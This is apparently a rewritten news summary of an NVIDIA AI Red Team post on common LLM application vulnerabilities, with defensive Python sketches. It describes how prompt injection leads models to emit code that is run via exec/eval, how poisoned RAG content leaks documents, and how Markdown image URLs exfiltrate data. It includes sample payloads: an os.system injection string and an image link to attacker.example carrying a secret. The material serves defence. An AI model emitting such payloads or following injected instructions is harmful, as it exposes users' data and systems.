NVIDIA AI Red Team Shares Practical LLM Security Advice

By Rich Harang, Joseph Lucas, John Irwin, Becca Lynch, Leon Derczynski, Erick Galinkin, and Daniel Teixeira; rewritten by AI News Staff

The NVIDIA AI Red Team (AIRT) has evaluated numerous AI-enabled systems, identifying vulnerabilities and security weaknesses. In a recent technical blog post, the AIRT shared key findings from these assessments, with advice on mitigating the most significant risks in LLM-based applications. The most common vulnerabilities the team identified include:
  • Executing LLM-generated code can lead to remote code execution: Passing LLM-generated output to functions like `exec` or `eval` without sufficient isolation lets attackers use prompt injection to steer the model into producing malicious code that the application then runs.
    * Mitigation: Avoid `exec`, `eval`, and similar constructs. Instead, structure the application to parse LLM responses for intent and map them to a predefined set of safe functions, as in the sketch below. If dynamic code execution is genuinely necessary, run it in a secure, isolated sandbox environment.
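A minimal sketch of the intent-mapping approach, assuming the model is prompted to reply with a small JSON command; the function names and schema here are hypothetical, not part of the original post:

```python
import json

# Hypothetical allow-list: the only operations the application will ever
# perform, regardless of what the LLM returns.
SAFE_FUNCTIONS = {
    "get_weather": lambda city: f"Weather lookup for {city}",
    "get_time": lambda tz: f"Time lookup for {tz}",
}

def dispatch(llm_output: str) -> str:
    """Parse the LLM response for intent and route it to a predefined function.

    The model is prompted to answer with JSON such as
    {"function": "get_weather", "argument": "Berlin"}; anything that does
    not map onto the allow-list is rejected rather than executed.
    """
    try:
        request = json.loads(llm_output)
        func = SAFE_FUNCTIONS[request["function"]]
        return func(str(request["argument"]))
    except (json.JSONDecodeError, KeyError, TypeError):
        return "Rejected: response did not map to an allowed operation."

print(dispatch('{"function": "get_weather", "argument": "Berlin"}'))
# A prompt-injected payload is never passed to exec/eval, merely rejected:
print(dispatch('__import__("os").system("whoami")'))
```

The key property is that the model's text never becomes code: it only selects from operations the developer defined in advance.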
  • Insecure access control in retrieval-augmented generation (RAG) data sources: Weak permission handling in RAG implementations can leak documents to users who should not see them and opens the door to indirect prompt injection through attacker-writable content.
    * Mitigation: Enforce permissions on a per-user basis, review how delegated authorization is managed, and limit broad write access to the RAG data store. Consider excluding external emails from ingestion or letting users select which document access levels their queries may draw on. The sketch below illustrates per-user filtering at retrieval time.
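A minimal sketch of per-user access control at retrieval time, with hypothetical document records and ACLs standing in for a real vector store and identity provider:

```python
from dataclasses import dataclass

# Hypothetical corpus; acl lists the users allowed to read each document.
@dataclass
class Document:
    text: str
    acl: set[str]

DOCS = [
    Document("Q3 roadmap (managers only)", acl={"alice"}),
    Document("Public onboarding guide", acl={"alice", "bob"}),
]

def retrieve(query: str, user: str) -> list[str]:
    """Return candidate context for the LLM, filtered by the caller's ACL.

    The permission check happens at retrieval time, per user, so a
    document the user cannot read never reaches the prompt and
    therefore can never leak through the model's answer.
    """
    # A real system would rank by embedding similarity first; the ACL
    # filter below is the security-relevant step.
    return [
        d.text for d in DOCS
        if user in d.acl and query.lower() in d.text.lower()
    ]

print(retrieve("guide", "bob"))    # ['Public onboarding guide']
print(retrieve("roadmap", "bob"))  # [] -- filtered out before prompting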
  • Active content rendering of LLM outputs: Rendering LLM output as Markdown or other active content can enable data exfiltration, for example through attacker-controlled image URLs that the browser fetches automatically.
    * Mitigation: Implement image content security policies, display the full destination of links to users before connecting to external sites, sanitize LLM output to remove active content, or disable active content rendering entirely within the user interface. A sanitization sketch closes this post.

The NVIDIA AI Red Team recommends addressing these vulnerabilities first to secure LLM implementations against the most common and impactful threats. For readers who want to better understand the fundamentals of adversarial machine learning, the team also offers an online NVIDIA DLI training course, Exploring Adversarial Machine Learning.
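As referenced above, here is a minimal sketch of output sanitization, assuming Markdown rendering in the UI; the regexes and attacker URL are illustrative only:

```python
import re

# Markdown images (![alt](url)) are the classic exfiltration channel: a
# prompt-injected model can encode stolen context into the image URL,
# which the browser fetches automatically on render.
IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\([^)]*\)")
LINK_PATTERN = re.compile(r"\[([^\]]*)\]\(([^)]*)\)")

def sanitize(markdown: str) -> str:
    """Strip active content from LLM output before it reaches the UI."""
    # Drop images outright: rendering them triggers a zero-click request.
    text = IMAGE_PATTERN.sub("[image removed]", markdown)
    # Rewrite links so the full destination is visible to the user
    # before they choose to click.
    return LINK_PATTERN.sub(lambda m: f"{m.group(1)} ({m.group(2)})", text)

poisoned = (
    "Done! ![x](https://attacker.example/?q=SECRET) "
    "[docs](https://attacker.example)"
)
print(sanitize(poisoned))
# Done! [image removed] docs (https://attacker.example)
```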